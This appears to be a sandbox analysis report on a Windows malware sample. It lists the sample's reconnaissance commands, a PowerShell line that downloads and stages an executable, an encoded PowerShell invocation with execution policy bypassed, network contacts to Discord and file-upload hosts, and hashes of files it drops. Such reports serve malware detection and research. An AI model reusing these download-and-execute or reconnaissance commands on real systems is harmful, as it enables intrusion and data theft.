C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get caption,description,providername

C:\Windows\system32\net.exe

net user

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user

C:\Windows\system32\query.exe

query user

C:\Windows\system32\quser.exe

"C:\Windows\system32\quser.exe"

C:\Windows\system32\net.exe

net localgroup

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup

C:\Windows\system32\net.exe

net localgroup administrators

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup administrators

C:\Windows\system32\net.exe

net user guest

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user guest

C:\Windows\system32\net.exe

net user administrator

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user administrator

C:\Windows\System32\Wbem\WMIC.exe

wmic startup get caption,command

C:\Windows\system32\tasklist.exe

tasklist /svc

C:\Windows\system32\ipconfig.exe

ipconfig /all

C:\Windows\system32\ROUTE.EXE

route print

C:\Windows\system32\ARP.EXE

arp -a

C:\Windows\system32\NETSTAT.EXE

netstat -ano

C:\Windows\system32\sc.exe

sc query type= service state= all

C:\Windows\system32\netsh.exe

netsh firewall show state

C:\Windows\system32\netsh.exe

netsh firewall show config

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gxl5eawx\gxl5eawx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD52.tmp" "c:\Users\Admin\AppData\Local\Temp\gxl5eawx\CSCA2000AA099924A6D852CCA33F2F612C8.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'بتحط هنا رابط باتشك' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Kokox.exe' -UseBasicP"

Network

Country  Destination           Domain            Proto
US       8.8.8.8:53            ip-api.com        udp
US       208.95.112.1:80       ip-api.com        tcp
N/A      127.0.0.1:50065                         tcp
N/A      127.0.0.1:50084                         tcp
N/A      127.0.0.1:50107                         tcp
N/A      127.0.0.1:50112                         tcp
N/A      127.0.0.1:50114                         tcp
US       162.159.135.232:443   discord.com       tcp
US       162.159.135.232:443   discord.com       tcp
FR       51.75.242.210:443     api.gofile.io     tcp
N/A      127.0.0.1:50282                         tcp
N/A      127.0.0.1:50284                         tcp
FR       45.112.123.227:443    store1.gofile.io  tcp
US       162.159.135.232:443   discord.com       tcp

Files

memory/3132-0-0x0000000000F60000-0x000000000218E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Exela.exe

MD5 c5669d422429ecf07edc2f00821ecd93
SHA1 8da6ff8a15bd667719a72aa3ac5af33fb1c640c3
SHA256 3ade121ba195ca8e6e37aaeb84152e735b89cdd68f0a14b787c4d0d3f7351e00
SHA512 d686372bacc27848c093012b64791a956cb3cd3bc915b65949d0cf4056e0317763d4dd3abf3b75ee55c968ee43e821a17796999a7978dde85d9e9133610a1253

C:\Users\Admin\AppData\Local\Temp\no defender.exe

MD5 c80d2a00b97cf55170b221f8a8f65e81
SHA1 a03c17751d8db91e1e66460093855dabbcfcc04b
SHA256 af69ac0bc29db1b5bc7957411de2f49469525e32dbf76932d93489021f2bfe85
SHA512 48b54cfe518b77a83957f7e1edad3ea09bc18f79ad24158b79345f1d29810e805340e74cc5b33effb081959502b7ea305fe1e0035450e2ecd03e6c5307b92879

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log

MD5 2cbbb74b7da1f720b48ed31085cbd5b8
SHA1 79caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256 e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512 ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

C:\Users\Admin\AppData\Local\Temp\A066.tmp\A067.tmp\A068.bat

MD5 bffa0b357688d06c9f66c79a5d091f8b
SHA1 bc20d3a70777c646a86e5c4b98f3a038f0821106
SHA256 d2e461a8175a5a964e2012329e72b339c43386e9ded1bb742fd7233400a9c9df
SHA512 36f23e89943ea250ee71ee832e55e3eba396ede87689e6f0fce478118cdf46ef4b06f068c2ca24e128a3cfc242119794411dc930e3d67434598410fc50cce903

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_40x2aptv.km3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\_MEI2482\ucrtbase.dll

MD5 3b337c2d41069b0a1e43e30f891c3813
SHA1 ebee2827b5cb153cbbb51c9718da1549fa80fc5c
SHA256 c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7
SHA512 fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

C:\Users\Admin\AppData\Local\Temp\_MEI2482\python311.dll

MD5 db09c9bbec6134db1766d369c339a0a1
SHA1 c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b
SHA256 b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79
SHA512 653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45

C:\Users\Admin\AppData\Local\Temp\_MEI2482\VCRUNTIME140.dll

MD5 f12681a472b9dd04a812e16096514974
SHA1 6fd102eb3e0b0e6eef08118d71f28702d1a9067c
SHA256 d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8
SHA512 7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

memory/952-128-0x00007FFF227A0000-0x00007FFF22D88000-memory.dmp

memory/2224-122-0x000002500D090000-0x000002500D0B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI2482\python3.dll

MD5 34e49bb1dfddf6037f0001d9aefe7d61
SHA1 a25a39dca11cdc195c9ecd49e95657a3e4fe3215
SHA256 4055d1b9e553b78c244143ab6b48151604003b39a9bf54879dee9175455c1281
SHA512 edb715654baaf499cf788bcacd5657adcf9f20b37b02671abe71bda334629344415ed3a7e95cb51164e66a7aa3ed4bf84acb05649ccd55e3f64036f3178b7856

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-interlocked-l1-1-0.dll

MD5 ee5bb5fc7b94b7413b9f4ade5dcd404e
SHA1 6d615205f7d44cf0a77e7d943d33a2915bd636d8
SHA256 22cf7040d9cb3dc79d941a6bbe4cebd5beaa1355d6e424843e6970404281e61e
SHA512 954d5b6a51334eb1a602aa35f29a2c84a025438784f77d5f4c96d465cd5cf1229dd55edf1c3faa14edae5f25ed74dbc175a143d8ed93ee24f98c0fe678569031

memory/952-181-0x00007FFF3D3D0000-0x00007FFF3D3DF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI2482\select.pyd

MD5 c39459806c712b3b3242f8376218c1e1
SHA1 85d254fb6cc5d6ed20a04026bff1158c8fd0a530
SHA256 7cbd4339285d145b422afa280cee685258bc659806be9cf8b334805bc45b29c9
SHA512 b727c6d1cd451d658e174161135d3be48d7efda21c775b8145bc527a54d6592bfc50919276c6498d2e2233ac1524c1699f59f0f467cc6e43e5b5e9558c87f49d

C:\Users\Admin\AppData\Local\Temp\_MEI2482\pyexpat.pyd

MD5 fe0e32bfe3764ed5321454e1a01c81ec
SHA1 7690690df0a73bdcc54f0f04b674fc8a9a8f45fb
SHA256 b399bff10812e9ea2c9800f74cb0e5002f9d9379baf1a3cef9d438caca35dc92
SHA512 d1777f9e684a9e4174e18651e6d921ae11757ecdbeb4ee678c6a28e0903a4b9ab9f6e1419670b4d428ee20f86c7d424177ed9daf4365cf2ee376fcd065c1c92d

C:\Users\Admin\AppData\Local\Temp\_MEI2482\libssl-1_1.dll

MD5 6cd33578bc5629930329ca3303f0fae1
SHA1 f2f8e3248a72f98d27f0cfa0010e32175a18487f
SHA256 4150ee603ad2da7a6cb6a895cb5bd928e3a99af7e73c604de1fc224e0809fdb0
SHA512 c236a6ccc8577c85509d378c1ef014621cab6f6f4aa26796ff32d8eec8e98ded2e55d358a7d236594f7a48646dc2a6bf25b42a37aed549440d52873ebca4713e

C:\Users\Admin\AppData\Local\Temp\_MEI2482\libcrypto-1_1.dll

MD5 86cfc84f8407ab1be6cc64a9702882ef
SHA1 86f3c502ed64df2a5e10b085103c2ffc9e3a4130
SHA256 11b89cc5531b2a6b89fbbb406ebe8fb01f0bf789e672131b0354e10f9e091307
SHA512 b33f59497127cb1b4c1781693380576187c562563a9e367ce8abc14c97c51053a28af559cdd8bd66181012083e562c8a8771e3d46adeba269a848153a8e9173c

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-utility-l1-1-0.dll

MD5 5f936491b052a832af3e509664cdbb14
SHA1 901bfc680eb6944457c961c2b1f7acfc22bbeb5b
SHA256 a7f53b76e7ea837f45bdb8712a864fb0c427c5eb863d155a72b422b96417ea10
SHA512 6a8e7a80b162b5d7e512c7a5419dcd07832f929af2a79c74640fd7ef0189c50ccf78c8afa9678afc95152e56e92f7e7e86a2612b0f63e03989839dcd7153db2a

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-time-l1-1-0.dll

MD5 2710cc3c97a43f2c4280a1483e69eac3
SHA1 853fd337682bd1122118a686f51bc265bf778a48
SHA256 554b506ca648507f10eeb5bae124ff91594f5fdd81d33b0171334be7ad5c7816
SHA512 eefceaae770f417901124790a6aecc95ca294f533554b861d6d34c5c0748a2a90bf16b8ff32dbbda3049b32f607cca24d2db32b040faf616bbf64369c5579b33

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-string-l1-1-0.dll

MD5 73beb313800b1c4967a4dec481da0bf9
SHA1 933a189d028066ff08fa78ac8058916fc7892998
SHA256 9636be82c51d61dd990504d786fac0d51d41f73d22700a18d4fbbfcf6da5dff5
SHA512 0fa631e9543dbea34aee3aab1295a1c373457dd1e2649478ef5d4d15b877979eec0d73cf4a5dd87e85c8a308265092d6d98ae97196e8caaa0f35a9a627243c99

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-stdio-l1-1-0.dll

MD5 c6fab38852d8b71a62e4b6c6b1ecd733
SHA1 11aa6f21614dae9727e6d0e5cec339553f482be8
SHA256 1516552690d6a38d65a8016d889f2ce1515649be6a45ef82cbed08a73690a7b4
SHA512 8f04946369104fe6d092fcece49856a4b11ab92396ca4d2126355178db15becbf9db887d1ce53294849ddf6b77e263a43ee68242e9fa079f44ecee14a39e133b

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-runtime-l1-1-0.dll

MD5 28ca7ca918e132822c47024beb65c30f
SHA1 a27a45c473582d368bcf4e9faf21f02e43689ae8
SHA256 1d7d6e883472eb5ddafe383adbaa5f8ed7b9d6267e7ade971bbff47ec4b47935
SHA512 d26cb0f7c0bde5a6e5ceb8a37e763a40d159e38be74993a42f10091515b179a716e4e64289db4631a6a0b41a8ba5395540a16fba0e342f0f4d984bded021a87b

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-process-l1-1-0.dll

MD5 5acf4b9d3487d85f2e204aead39d5664
SHA1 e5bd8492d65da2969914d41ee09609b6c47818be
SHA256 a7433b9f8965f914da00dda4ede62d4db69f561a548cbc8d312293d0917a33c7
SHA512 e93c8daa7ad9ce7055438bc787fced6e0a3233dcabb2edb643d3a35779d65778337b798225437971674fdd30d8bc6dd7ac7eb0f550d4c8caf99436de877b2fbe

memory/952-192-0x00007FFF3A8B0000-0x00007FFF3A8C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-math-l1-1-0.dll

MD5 407d577907e199daec931d09f3ca202e
SHA1 bfb05663117b49715a2e31ae7f0c38aaec5fa152
SHA256 98e8728908f2872819728e709291529bac39751dec7d01c03a175c4688b9c233
SHA512 d5d76cfb0b572379655032156028a284b946368bbf4930d4318298caf2091ba2d364999849b53bc22bfc09d5e75943d921bccd902ceb38c0a14a7083035f898d

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-locale-l1-1-0.dll

MD5 93afd2a53dfa4aa1e35ea615d76b6c01
SHA1 22c4550b96fd30dd64b214d6246e9458c1c699c2
SHA256 31fc3b5665c3bb2006496b5cbb0e5667b186263a867dbe5a760a996305f4f514
SHA512 979bf81c2cbbc19e2cf13e6871cec24fa1b9f1fa06e15cfade74dc211032053a3b8622ffc9a6dde86134a01f18140250f438797ac5acbe340a361213702e7277

memory/952-195-0x00007FFF39B90000-0x00007FFF39B9D000-memory.dmp

memory/952-194-0x00007FFF3A850000-0x00007FFF3A869000-memory.dmp

memory/952-193-0x00007FFF3A880000-0x00007FFF3A8AD000-memory.dmp

memory/952-196-0x00007FFF350A0000-0x00007FFF350C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-heap-l1-1-0.dll

MD5 60d8195416792fa2ac327445912d352d
SHA1 d53c3c2e9e0106c95c02632fdd093cfd01ae9900
SHA256 d7fab15f2d1298a11822ce5c7756da2eab1112bd3561b22db6b25a5a8acafad6
SHA512 470ee830ae66ad3331a5a928dcbc2f6865064c1c494a36747fa92ea2a328bbe2da917d1ab8374d16b1ea9002879757b34c4bd6afa2226d7d1a922fe1b34e0461

memory/952-197-0x00007FFF22280000-0x00007FFF223F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-filesystem-l1-1-0.dll

MD5 6e6a258763888c7a49491a39868be3db
SHA1 7867377f30bc3744be4a0f1b265ef3a5ed0ecc00
SHA256 d9fc17ce5dd5aecac0dca2d9a17a20271a13f68cd6cfa89163d72904a72f6b8a
SHA512 97ec6626e64c52d98ea0d6897a5bd4cd3ea5639c37a406119e2d7579e2951b156eb9f8dd62b76ffb79ae7bf6678aa21c9073f759d8de4acc3b575a9f98c6782b

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-environment-l1-1-0.dll

MD5 e6b9e39476a87a611524331549c7ec47
SHA1 36513f3c137a5b1e8d195f833ba0a381f3f61f7a
SHA256 b84f44a882b2caa6d0bc3c01e8d012e881324b800fd39e2728fecdc65315a245
SHA512 865f3e9c519b67f5e9cb5fdfc9ec148e90a5c37ab78506356364712aa0b320a25558544b1e814629be92617666a1676d16ceccdd4dce2f6d11ed3d08eb582ef6

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-convert-l1-1-0.dll

MD5 aa4189a2860aa4a59a1d09c41566b014
SHA1 e24414e590f40ea8e4c40067193da5610e64e165
SHA256 1f818ccd44865c7c91c1ee5df7d21dc17840601d7470c0d1a486c5874304edd2
SHA512 738943f74bc506a9c6bfa478bf31fdefdbed740a8f1fdfe40ae78257c920f25bf76ae4f3c1a2e4157d77cfe0c12c641e81091a7f507ee404abf3201cfe80d4b9

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-crt-conio-l1-1-0.dll

MD5 8fac4c0488e4734b9b3df2006caeabb2
SHA1 783c1c210c67e7f23ba6a9e41f7999ab67e1fcfc
SHA256 bf651fcd0f10dc528caa3168abd6ea528458c78aaa75b93b3c615d5a18567192
SHA512 0f5c3f097a5785a68bf4688a9b5975fdf90e180d3287d67ab600fab16ec146a3330916b89e81162c335ca578bfcf6e1f9bed1653c61a20abf7a7e58d08310fa2

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-util-l1-1-0.dll

MD5 175fc9b538e4d6d13d07acc4383c907c
SHA1 d27d5890bb3d50f0a40bdf17685f49d529b01a12
SHA256 edd387b01cb9d85a44e27e656e5ea6898b8e9604682db29cb87ee3236f3a1d9f
SHA512 195c78ac1175b87bc0422ac706c671616e2c1fcb373e28210682d775bf875227b9b31c6fd16a4fb901a3a4e9d9b5b0a8067497d71f104d01cbccda37567ab046

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-timezone-l1-1-0.dll

MD5 5543fb8a912a0c9317589ea420cdd914
SHA1 a1431fd32f29fa2e6e6e04156764dbb70b7ec8b7
SHA256 bd4e40b2f5d0f60feceeb7622166e1a61fb34ac2cd5484e1d9826c7cffa3029c
SHA512 405ab712e9fc0ca7e318ffe8585bb7eb7d3c93ae56d9468ee7c81b91e7ae1c7bcaa03d4cd884abd4229f45cc65bd4f85c53bbb0bdc4cb1ecd53b06d3d199e1e4

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-sysinfo-l1-1-0.dll

MD5 f5cb1600d1cd61c17394556805818f20
SHA1 f7be7748bd8d32638fa253c7a8933dfc6a4e0f56
SHA256 e92ce06aa782a4e50a5bc95da5ac5ded0dc3da7e1152078002a12367aa7cc1af
SHA512 4e4e3a27635d19f55760b27986bd5fab8a0c56ae26c5e35e9a7e4c48a543a36d9f05990292b9d83410d16061d79dda3de208389b78a13cca83aa272239f834eb

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-synch-l1-2-0.dll

MD5 34e5600f2244f5d0b00f00d9cd0d83b5
SHA1 dde2f5e6f4d6847ec16c0b5e368f0256a08307ce
SHA256 2d04920e410d81e3a044a76724a23cf892b23a5b382fb079abd6f689199c7428
SHA512 3d7b013793bfe1da1caf1e312451fc1bb0de53deb3a2a7d227830d4e52571de2433a4e695b3116ed3129a9d96e93a307b2bb16a317050d0bd8ea88bfc7ebc4ac

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-synch-l1-1-0.dll

MD5 0a5e0f886c97c23ba862520aa624c745
SHA1 a3a8434e9578b09d1b4f63bd992e8a4fa79ed177
SHA256 882edcaa7b39dc9e330d1b3dcb2a770be2404d6358d76cf4cf5e52231bedac60
SHA512 8b5df45e2827492e703564ee0731beba221a1faa7137aa980991f9e7d66b50916c26025d9157bd54bfc5c0b2ea6b04507247140bb5cc6d7d6a52fed34c794a4b

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-string-l1-1-0.dll

MD5 0e34f7b6f4edb70c972772d4c3820c4e
SHA1 561329c9c81aa0b4f5d2b278cd97cdb32f42d238
SHA256 c9103f6afdd8a6fea734da372911b0a3b018a84e00675a9355ea6f091e641781
SHA512 07e9d0cc5e5b4850adb5aa83466b7acd6854a6e8e230ad8e5eb63a4bc52ec1ed24536ddff025d8a65cccd8e00df326ea9338bfea30abb2942fca3979ca30c642

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-rtlsupport-l1-1-0.dll

MD5 a63de0416788e90cab093393edccb1b3
SHA1 9d1f572ea39403916703864a690fe9c3affbbe5a
SHA256 02fd3b0adf86967b6fc133797c12fa9ee8d0cf64778b5ca937b56e86ac726343
SHA512 06a257fbfb7e70ea2f55789b258a29fb7df5bc1d5baf195da2fd4d03a96e3e634565f8b762e7f76376cefba500de71dba114fbb661ac70ba7a16ab6b149abbe6

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-profile-l1-1-0.dll

MD5 bf23831af3f7be93a8026b66a8c920ab
SHA1 07efccb8cc2cf29f40d54caf358559a31b99c46c
SHA256 cac8fb2938ed80bd7eed42e3c68dead6cb41c30cfb567f23085986422f1a2747
SHA512 b8937b1c4039f2e08088f92d2a491c76c6720a0072c92b261ee3b8ce403a4cb6c5a6bedfded93414b6212e6a5a943c78e15a32c0c603e6741c1d5d76554d1c39

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-processthreads-l1-1-1.dll

MD5 17aa74d08778d62a946f62f0ca9583d3
SHA1 06dea29dd28457783b753be4e28cb16fe6eb1e2a
SHA256 5c566535a9ac607fa99a665ab246ffb78767995dde86c4a9a5c518dd22b76e56
SHA512 dd69d76b2ac8524049d1ae23b241c25846a3f1f1a93e6884ce4acf2d3a9fa3ee94777a9924183b5b3a3b9de9008a3896bb88195c4e82c22d5a7f17e785dd8500

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-processthreads-l1-1-0.dll

MD5 ede66c159083ab6ec6d00a30d65fd13a
SHA1 2ea70c9681fa09647b69554c4b0e335446f4565a
SHA256 42f88e44e488a74af796e8c2a2548879764a40e554f35d1deb8eaff5def09e20
SHA512 c667e4658828f9df3a37e233994eab5f8dcb06542b68afe3a5ec520a30d09d2d8a4b76959777697a288a0eef90ab7b4b128c5e8193339118957f43e4e38c70ee

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-processenvironment-l1-1-0.dll

MD5 c4a0a79a0dcd0b407df304501c33ccd5
SHA1 5e1dfa5e98634cad712d2711be3d3f0e5a671b95
SHA256 3add350dcd79c64a98e47adf733f26c9fdf47df097b060f04f067cdaf32e99cc
SHA512 acb737c371ff7ef187ad0ba0eb1c2d29aa7ae8d546ff74f998fbe6081349c8fc21b05b6c3b55a9cc28b9765161e50fffa0ea7af4a83f6c5ad34183c0cf10b582

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-namedpipe-l1-1-0.dll

MD5 e06db624dc643c0f8d9c1b640960689a
SHA1 b1bf5159bb1aa7ed30288e5db4b8146be874c072
SHA256 245cf5d5abc866d5ce327c4a1524ae3954ccfc9a7284c817fa15962695e6b6fa
SHA512 a8176dad7540cb5ea8017ddd66626a3172fc2b22404d5bead434b60bb9df28c190ea51892df333fdec5e08819cf3bda3280096c930807cf0d375e5c6b0506c44

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-memory-l1-1-0.dll

MD5 a63629924496dfc53245605c47563798
SHA1 0452471b1024711f99891340300657ec8d38fa75
SHA256 9c5ea7a7e943c65da3aeff4da33b47fc4a3becea2f7a0b6aa2b632cd6d8b4632
SHA512 072c2407224aba338dfb0c65fbdce30ee368f76fcc7d96f1e44d68a8ba98dae3647cfa3d4e1c51be8116fec210fdc36251c5f72d40ec5bb7b91e965f90aded72

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-localization-l1-2-0.dll

MD5 578f22f3cfe28f68f21b4665d90d0fd5
SHA1 e4e3887f2f63eed765e4df6d65e2d599a94079db
SHA256 e4011458af1397e26d0b233cbb2fa661faa6dae7b7a9541e9311c8af1ecb5e48
SHA512 14902536b9325afa8e376458137373e22d7a6898164575be73c08ecd08df381a6dff1878e6995ee6956224a5a3f6df3746ae149f82e30bb136986c386ed4c792

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-libraryloader-l1-1-0.dll

MD5 2a2e22f35b83aab6db3d7b27c5af1953
SHA1 5531e1b2899d52cf44d92a521db503cfab6beb26
SHA256 425e4ebee71347295e36776d415611d451e2a51b451df57da23ed8f8fb4664e8
SHA512 269c09638fd5308d1719cb7af9132e0d158318a1b76a9a16495619ca6dbb8f1370af0d76fc709ea9c6f14064390161cda19f53ad240dc646b065ab8056e3049a

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-heap-l1-1-0.dll

MD5 cdd1ef7807185eeee2d5ac3bae51bdd5
SHA1 441b7dcc090f6e2552b7b70c75ffeae96cf3448d
SHA256 6d14b49e8e21de08b9fa778f15c259dbd4feb9b54eb628d69bd50e5c86aa65a5
SHA512 ae57c48830cf4b0dd577e3bf5353defc9420814f340589eccfb7419d82c6459bb6a6b4163f57642407e3fc35e35f9a0a9c2ff3029e024c27e20ad20019cf0982

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-handle-l1-1-0.dll

MD5 517b80a416198dcfc9a1572625819506
SHA1 589fb8ae55c87dde75bbfc5bef4f29edb66cb44e
SHA256 2783b85d98f4a92faf67a94fc04e9c2f6786627949984828d14deab1682bbe3f
SHA512 1c7d4b693a42a14c25eb1060c8d6735e1d6d2d6db934f5f3a7dd67bd82c3be3ea3bbb6ea0b98ac1ab15e7ba393d76140012f7eaabb9d0577f965fd8b40487d4f

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-file-l2-1-0.dll

MD5 50abf0a7ee67f00f247bada185a7661c
SHA1 0cddac9ac4db3bf10a11d4b79085ef9cb3fb84a1
SHA256 f957a4c261506484b53534a9be8931c02ec1a349b3f431a858f8215cecfec3f7
SHA512 c2694bb5d103baff1264926a04d2f0fe156b8815a23c3748412a81cc307b71a9236a0e974b5549321014065e393d10228a0f0004df9ba677f03b5d244a64b528

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-file-l1-2-0.dll

MD5 8ad4771e23185cb7672f71ec16c580cf
SHA1 a7cd8fe0df07820296bb53700d0698f2dc042247
SHA256 b153ff5d667c8297776f21c5f440cff28c3e3a5b1f748fd4700306e1fb283ed8
SHA512 0f976083c020f683643b7ecd5fe15b3997df4c6508bf5b2f40a920ee53cd153d969c09e3207d11759a2b60bfb21adeee9ccea2d122c4ae9852ff6fed2fd88ef2

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-file-l1-1-0.dll

MD5 bcc620dcc9a3a9dfd38663a971b7044b
SHA1 8e24ffcc313522f908b90c763c3b31debc57be84
SHA256 f73000652ca7ca7468ca6134663c99cbaf7bd97740bdbdd5d1e1e23ccfd5db75
SHA512 39a18ae66346d86b68629129856ad18d06dce8993d8133d7bd2d6b90b46825d76775ef29938c15bac88d7732d0d8db039f64ac944e45c40ece6d7ec6ae4adf10

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-fibers-l1-1-0.dll

MD5 824a1932c5c58891152ae1de02eef652
SHA1 5d864e1f6a664ebcc004b0465cf9bfb8f964d18f
SHA256 83ecd4fc05c5603621ab687657b8862175025c9910f8dc1b23135d2350dd9219
SHA512 b965b9a8e952018f243eaacc933701ac6c8fea4a5dfee55153cd54bfd8749227fb6c459852c5f4fdef509c9ba73ed81a28369dcd89818906788a57cc92e204ce

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-errorhandling-l1-1-0.dll

MD5 a538b281f8e84cecdac507c73a43d744
SHA1 8d5979e196eaeeeda5639b2a848068bfad4bd7bc
SHA256 45afaf08d1cd7e43ac5ded47ed5fd708b86e835a9470c81e8130ed6955b84db8
SHA512 edc3cf93ef5b6291aac523a0d68c7e7df4b818378b82247cf7361474df5a75a17ad87c98f49a4f7dfd7f89948fb5c11152d4065abbb0b8533af38c562fef99a1

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-debug-l1-1-0.dll

MD5 7dc2026abedaa10841eae4129ef1a9ae
SHA1 e1e48d02c970960ac50c012a5ad72e4834dd7f42
SHA256 e83d5e5eb772070999f34a214ebffcf0a6068ebc1c4b4f1991188448f323808d
SHA512 05e8431692813e831947e941e6852b70e17e26352aa4e3a0f3cedefb241caee71a907fdd4855762dfaf3122dc8fb5e9a22c27b6dfe6e4473f23685cfd3c0a5cf

C:\Users\Admin\AppData\Local\Temp\_MEI2482\api-ms-win-core-datetime-l1-1-0.dll

MD5 1dc5b99c16502d75dd924eeda562461c
SHA1 6fe83ffc232c732cb513cecdd60d91c3d051d494
SHA256 4e08856ff5203592c27f943f5586d2214b7c5dacde1b1ef75c2316590ab788c9
